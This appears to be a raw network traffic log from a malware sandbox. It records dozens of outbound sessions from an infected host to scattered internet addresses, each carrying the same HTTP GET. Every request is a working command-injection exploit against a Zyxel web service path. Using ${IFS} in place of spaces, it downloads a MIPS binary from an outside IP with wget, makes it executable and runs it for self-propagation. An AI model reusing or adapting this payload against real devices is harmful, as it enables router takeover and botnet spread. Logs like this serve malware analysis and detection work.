                                              Jan 29, 2024 07:03:56.116741896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5831192.168.2.1448196189.226.58.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116780043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5832192.168.2.144485846.14.137.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116825104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5833192.168.2.1440932135.93.235.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116852045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5834192.168.2.1433248217.4.186.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116873026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5835192.168.2.144169295.73.206.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116933107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5836192.168.2.145604487.112.128.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116967916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5837192.168.2.1455072124.215.173.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116997004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5838192.168.2.1433744175.56.234.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117064953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5839192.168.2.1455572131.176.216.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117101908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5840192.168.2.144406471.41.16.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117161989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5841192.168.2.1452510163.145.99.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117187977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5842192.168.2.145402674.173.223.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117218971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5843192.168.2.144492237.245.212.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117269039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5844192.168.2.1448696136.242.96.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117299080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5845192.168.2.1457860108.121.82.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117346048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5846192.168.2.1435418159.246.121.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117367029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5847192.168.2.144436649.176.173.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117405891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5848192.168.2.1435170135.38.17.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117450953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5849192.168.2.1452402141.130.126.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117475986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5850192.168.2.143741457.87.134.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117527008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5851192.168.2.1441116174.253.144.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117563009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5852192.168.2.1444824125.18.215.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117611885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5853192.168.2.1438660204.85.135.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117652893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5854192.168.2.1445342122.21.243.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117702961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5855192.168.2.1438030111.48.65.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117733002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5856192.168.2.146023473.17.84.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117760897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5857192.168.2.1434682159.150.229.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117816925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5858192.168.2.145636653.29.131.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117841005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5859192.168.2.144481047.12.137.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117896080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5860192.168.2.145851683.70.159.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117925882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5861192.168.2.1441992143.72.64.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117955923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5862192.168.2.14423584.115.83.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.117995024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5863192.168.2.1443060113.187.159.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118025064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5864192.168.2.1454710112.89.84.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118099928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5865192.168.2.1435974175.162.242.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118125916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5866192.168.2.1438764131.252.232.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118177891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5867192.168.2.1453214171.94.97.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118217945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5868192.168.2.143450019.255.99.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118247986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5869192.168.2.1456290212.183.9.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118274927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5870192.168.2.1437896185.91.170.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118329048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5871192.168.2.144103880.196.67.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118369102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5872192.168.2.1434724139.64.81.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118401051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5873192.168.2.14476562.254.209.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118421078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5874192.168.2.144819034.138.205.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118486881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5875192.168.2.145581217.75.90.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118511915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5876192.168.2.1435968154.10.105.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118527889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5877192.168.2.145101298.194.209.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118555069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5878192.168.2.1451812147.248.243.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118598938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5879192.168.2.144202631.115.217.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118638992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5880192.168.2.1450312221.50.86.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118675947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5881192.168.2.1446948206.76.105.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118717909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5882192.168.2.145814061.6.109.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118745089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5883192.168.2.1448778151.81.15.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118782997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5884192.168.2.1438284152.99.176.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118818998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5885192.168.2.1434672216.171.168.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118870974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5886192.168.2.1436984212.176.167.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118921995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5887192.168.2.1457850115.121.62.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118967056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5888192.168.2.1440516113.196.89.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.118990898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5889192.168.2.146068084.166.66.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119065046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5890192.168.2.1448102155.145.39.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119095087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5891192.168.2.144348688.58.72.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119126081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5892192.168.2.146020840.239.0.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119155884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5893192.168.2.1451184160.189.72.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.119214058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5894192.168.2.14584104.174.117.170443
                                              TimestampBytes transferredDirectionData
